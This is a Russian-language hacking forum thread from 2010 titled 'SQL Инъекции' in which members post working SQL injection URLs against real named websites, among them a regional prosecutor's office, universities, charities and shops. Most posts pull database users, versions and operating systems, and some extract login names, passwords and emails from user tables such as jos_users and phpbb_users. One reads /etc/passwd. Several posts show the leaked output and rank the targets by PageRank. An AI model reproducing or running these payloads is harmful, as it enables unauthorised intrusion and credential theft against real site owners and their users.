SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.ritex-t.ru/index.php?id=2&row=-13+union+all+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),7,8+--
    version : 5.0.67-log
    user : u57230@10.10.10.208
    database : u57230
    os : unknown-freebsd6.3
     
  2. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    Code:
    http://www.gimn4.com/user.php?id=-3+union+select+1,concat(LOGIN,0x3a,PASSWORD,0x3a,REG_MAIL),3,4,5,6,7,8,9,10,11,12,13,14,15+from+system_users
    g4_user004@localhost:g4_new:5.0.51a-24+lenny2+spu1

    Code:
    http://www.crossmaster.ru/free-crossword-puzzles-stats-user.php?id=-3+union+select+1,2,3,concat_ws(0x3a,user(%20),database(),version()),5%20--
    Code:
    http://www.krasrepetitor.ru/card-user.php?id=-13+union+select+1,2,concat(user_name,0x3a,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+kr_user+limit+1,1
    krtmps@localhost:krtmps:5.0.67-percona-b5-log
    Code:
    http://www.cutezone.ru/pages/user.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(Login,0x3a,Password,0x3a,Email),30,31,32+from+std_users
    cutezone1@localhost:db_cutezone1:5.0.67-community
     
    #11942 heretic1990, 2 May 2010
    Last edited: 3 May 2010
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.home-sweethome.nl/en/index.php?pid=-3+union+select+1,2,3,4,concat(user(),version(),database(),@@version_compile_os)--
     
    _________________________
  4. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    ПРОКУРАТУРА КОСТРОМСКОЙ ОБЛАСТИ

    Code:
    http://www.kosoblproc.ru/default.php?page=news&id=-3044+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),5+--
    version : 4.1.9-standard-log
    user : kosoblprocru@localhost
    database : kosoblprocru
    os : unknown-freebsd4.7
     
    1 person likes this.
  5. G100M

    G100M New Member

    Joined:
    22 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    http://animeradio.ru/ownblog.php?uid=1'
    Не получается найти таблицы, кто нибудь может помочь?
    http://animeradio.ru/ownblog.php?uid=-1+union+all+select+1,2,3,concat_ws%280x3a,login,pwd,%20email%29,5,6,7,8,9,10+from+anime--
     
    #11945 G100M, 3 May 2010
    Last edited: 3 May 2010
  6. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    Code:
    http://www.volgotrans.mv.ru/front/profile.php?id=-573+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20--
    kater@localhost:volgotrans:5.0.51a-24+lenny2+spu1-log

    Code:
    http://www.ccs-tlt.ru/price/firm_profile.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10%20--
    ccstlt@localhost:ccstlt:4.0.24mysql Ver 34.52 Distrib 4.01.44, f-log


    Code:
    http://www.kfmesi.ru/profile.php?id=-16+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users
    naher@localhost:poher:5.0.51a

    Code:
    http://allaudi.ru/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--
    allaudi_user001@localhost:allaudi_mainbase:5.0.51a-24+lenny2+spu1


    Code:
    http://map.barierovnet.org/profile.php?id=-7+union+select+1,2,3%20--
    u175600@10.8.0.71:u175600_2:5.0.90-log

    Code:
    http://www.psbspeakers.ru/ru/news/index.php?id63=48+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20--
    
    
    
    root@:bonanza:5.0.45
     
    #11946 heretic1990, 3 May 2010
    Last edited: 3 May 2010
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.emiclassics.com/artistbiography.php?aid=-21+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+0,1

    PR-7
     
    _________________________
    1 person likes this.
  8. p@pillon

    p@pillon New Member

    Joined:
    3 May 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    4
    http://runaki.net/print.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,load_file('/etc/passwd'),3,4,5,6,7--


    http://runaki.net/details.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,user,3,pass,5,6,7+from+user--
     
    1 person likes this.
  9. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,596
    Likes Received:
    921
    Reputations:
    520
    Code:
    http://coh.redtomax.com/contacts/contact.php?id=99999999+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
    User: nofuture@localhost
    Version: 5.0.32-Debian_7etch11-log
    Database: nofuture
     
    3 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    орги


    http://www.hmsu.org/showgig.php?gigid=-178+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9+from+HMSUAuth--

    user(): root@localhost
    version(): 5.1.22-rc-log
    database(): hmsu
    OS: portbld-freebsd7.0
    --------------------------------------------------------------------
    http://www.globalcanopy.org/main.php?m=117&sm=-176+union+select+1,2,3,4,5,6

    user(): globalcanopy@localhost
    version(): 5.0.27
    database(): globalcanopy
    OS: шапочка
    --------------------------------------------------------------------
    http://www.mielomabrasil.org/news2.php?id_not=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

    user(): myeloma@187.45.193.218
    version(): 4.1.22-locaweb-log
    database(): myeloma
    OS: pc-linux-gnu
    --------------------------------------------------------------------
    http://www.archivalencia.org/contenido.php?a=5&modulo=71&pad=5&cat=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

    user(): usrarchi3871@localhost
    version(): 5.0.45-community-nt
    database(): db_archidiocesis
    OS: Windows
    --------------------------------------------------------------------
    http://www.cartadelapaz.org/portal_cp/ahumor_detall.php?id=-294+union+select+1,2,(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+agora.phpbb_users--

    user(): cartapaz@web.pangea.lan
    version(): 5.0.51a-24+lenny
    database(): cartapaz
    OS: Debian
    --------------------------------------------------------------------
    http://www.chantez-online.org/chant.php?ID=-833+union+select+1,2--

    user(): chantezonline@10.0.45.57
    version(): 5.0.90-log
    database(): chantezonline
    OS: pc-linux-gnu
     
    _________________________
    1 person likes this.
  11. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    946
    Likes Received:
    308
    Reputations:
    51
    http://www.wanlebanon2010.com - PR 6

    Code:
    http://www.wanlebanon2010.com/articles.php?id=-2+union+select+1,version(),3,4,5,6,7--
    Database Version: 5.0.51a-24+lenny3-log
    Database name: lebanon2010
    User name: lebanon@localhost


    -----------------------------------------------------------------------------------------------------------

    http://www.psy.ohio-state.edu - PR 6

    Code:
    http://www.psy.ohio-state.edu/php/FullEvent.php?id=63+union+select+1,2,3,4,5,6,version(),8,9--
    Database Version: 5.0.77
    Database name: department
    User name: soyung@localhost


    -----------------------------------------------------------------------------------------------------------

    http://www.genomics.cn - PR 6

    Code:
    http://www.genomics.cn/en/edu.php?id=-201+union+select+version(),2,3,4,5--
    Database Version: 5.0.77-log
    Database name: newbgi
    User name: www@192.168.8.5
     
    #11951 Skofield, 3 May 2010
    Last edited: 4 May 2010
    2 people like this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://202.120.108.10/depart/index.php?mod=Default&act=Xy&id=-7+union+select+1,2,concat(user(),version,database(),@@version_compile_os),4,5,6
     
    _________________________
  13. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    Code:
    http://tatural.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+
    
    http://kookdookoo.com/punjabi/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+
    
    http://poltavo.com/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+
    
    http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+
    
    http://www.home.zemliaky.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+
    
    http://ofaqim.info/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,id,username,password))),3,4,5,6,7+from+jos_users+--+
    
    http://i-de.org.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://snt-tvoydom.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://www.ruworld.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://www.newradio.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://mozhga18.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://www.g-news.com.ua/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+
    
    http://www.iaaf12.com/wap/wapmain.php?option=onews&action=link&id=-1+union+select+1,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+cms_users
    
    http://vig.bstu.by/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+jos_users+-0-+
    
    http://www.dpack.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+jos_users+--+
    
    http://crd-institute.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,password,username,5,6,7,8+from+crd_users+--+
    
    http://sams.perm.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8+from+jos_users+--+&Itemid=92
    
    http://www.foxcom.ru/jml/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--
    
    http://miacom.kz/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--
    
    http://www.misiabela.pl/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+jos_users+--+&Itemid=92
    
    http://www.wegp.net/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+jos_users+--+&Itemid=92
    
     
    #11953 .:[melkiy]:., 4 May 2010
    Last edited: 4 May 2010
    4 people like this.
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.mentalwear.fi/web/index.php?id=41&shop_show_product=1&tuote_id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

    user(): mentalwearfi@10.1.0.15
    version(): 5.0.45-log
    database(): mentalwearfired
    os: шапочка
     
    _________________________
  15. p@pillon

    p@pillon New Member

    Joined:
    3 May 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    4
    Pr 4

    http://www.plusbellelavie.org/news2.php?id=-1/**/union/**/all/**/select/**/1,user(),3,database(),5,6,7,8,9,10,11


    http://www2.candw.lc/Media/news2.php?ID=-1/**/union/**/all/**/select/**/1,user(),version(),4,5,6,7,8--


    user(): cwslu@localhost
    version(): 4.0.18-nt



    http://62.149.36.239/~pamco/news2.php?id=-1/**/union/**/all/**/select/**/1,2,user(),4,version(),6,7--


    user(): pamco_pamco2@localhos
    version(): 4.1.22-standard
     
    #11955 p@pillon, 4 May 2010
    Last edited: 4 May 2010
  16. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    329
    Reputations:
    73
    Сайт: http://www.sasymphony.org
    ТИЦ: 10
    PR: 5
    Пример запроса:
    Code:
    http://www.sasymphony.org/index3.php?eventIdD=-25+union+select+1,now(),3,4,5,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),7,8,9,group_concat(0x0b,table_name),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables--+
    version - 5.0.90-community
    user - sasympho@localhost
    database - sasympho_symphonysite
    os - pc-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    categories,   
    domains,   
    keywords,   
    link_keyword0,   
    link_keyword1,   
    link_keyword2,   
    link_keyword3,   
    link_keyword4,   
    link_keyword5,   
    link_keyword6,   
    link_keyword7,   
    link_keyword8,   
    link_keyword9,   
    link_keyworda,   
    link_keywordb,   
    link_keywordc,   
    link_keywordd,   
    link_keyworde,   
    link_keywordf,   
    links,   pending,   
    query_log,   
    site_category,   
    sites,   
    temp,   
    0506season,   
    0607season,   
    0708season,   
    0708ypc_scholar,   
    0708ypc_tix,   
    0809season,   
    0809ypc_scholar,   
    0809ypc_tix,   
    0910season,   
    0910ypc_scholar,   
    0910ypc_tix,   
    1011season,   
    Classical_seatingPrice,   
    PopsSpec_seatingPrice,   
    Pops_seatingPrice,   
    PressRelease,   
    Renewals,   
    band_email,   
    brd_directors,   
    cd_order_07,   
    cd_order_08,   
    cd_order_09,   
    cd_orders,   
    concert_series,   
    concert_series_detail,   
    concert_series_price_c,   
    concert_series_price_p,   
    donation_proc,   
    email_blast,
    columns:


    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    QUERY_ID,   
    SEQ,   
    STATE,   
    DURATION,   
    CPU_USER,   
    CPU_SYSTEM,   
    CONTEXT_VOLUNTARY,   
    CONTEXT_INVOLUNTARY,   
    BLOCK_OPS_IN,   
    BLOCK_OPS_OUT,   
    MESSAGES_SENT,   
    MESSAGES_RECEIVED,   
    PAGE_FAULTS_MAJOR,   
    PAGE_FAULTS_MINOR,   
    SWAPS,   
    SOURCE_FUNCTION,   
    SOURCE_FILE,  
    SO
    ===================================

    Сайт: http://www.franziskaner-minoriten.de
    ТИЦ: 0
    PR: 4
    Пример запроса:
    Code:
    http://www.franziskaner-minoriten.de/index3.php?id=130+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
    user - db_minoriten@localhost
    version - 5.0.45
    database - db_minoriten
    os - redhat-linux-gnu


    ===================================

    Сайт: http://www.enpi-info.eu
    ТИЦ: 20
    PR: 7
    Пример запроса:
    Code:
    http://www.enpi-info.eu/main.php?id=344&id_type=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(user(),+1,+63),+floor(rand(0)*2)))--+
    user - enpid@localhost
    version - 5.0.45
    database - enpidef
    os - redhat-linux-gnu
     
    #11956 aka_zver, 4 May 2010
    Last edited: 6 May 2010
    1 person likes this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.bosnia.ba/razglednice/index.php?dk=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+--
     
    _________________________
  18. Greaves

    Greaves Banned

    Joined:
    7 Apr 2007
    Messages:
    44
    Likes Received:
    21
    Reputations:
    0
    http://www.music-key.ru/shop.php?uid=-3071+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0--

    http://www.persons-journal.com/index.php?context=submenu2&id=271%20union%20select %20group_concat%28table_name%29%20from%20informati on_schema.tables%20limit%201,1/*&pid=265&s=188
     
  19. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    Host IP: 131.94.74.225
    Web Server: Microsoft-IIS/6.0
    Powered-by: ASP.NET
    Powered-by: PHP/5.1.6
    DB Server: MySQL >=4.1
    Current DB: cas

    Host IP: 69.163.245.54
    Web Server: Apache
    Powered-by: PHP/5.2.12
    DB Server: MySQL unknown ver
    Current DB: rhinossoccer

    Yandex ТИЦ 10
    Google PageRank 5
     
    1 person likes this.
  20. Greaves

    Greaves Banned

    Joined:
    7 Apr 2007
    Messages:
    44
    Likes Received:
    21
    Reputations:
    0
    Своеобразный вывод..
    Code:
    [COLOR=DarkOrange]http://www.globalresearch.ca[/COLOR]/index.p...t=va&aid=18768+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,ve rsion(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1, 2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8, 9,0,1,2+limit+1,1-- 
    Code:
    http://artmaterial.ru/about.php?content=dealer&id=-1%20union%20select%201,2,3,user_login,user_passwor d,6,7,8,9,0,1,2%20from%20users+limit+1,1
     
Loading...
Thread Status:
Not open for further replies.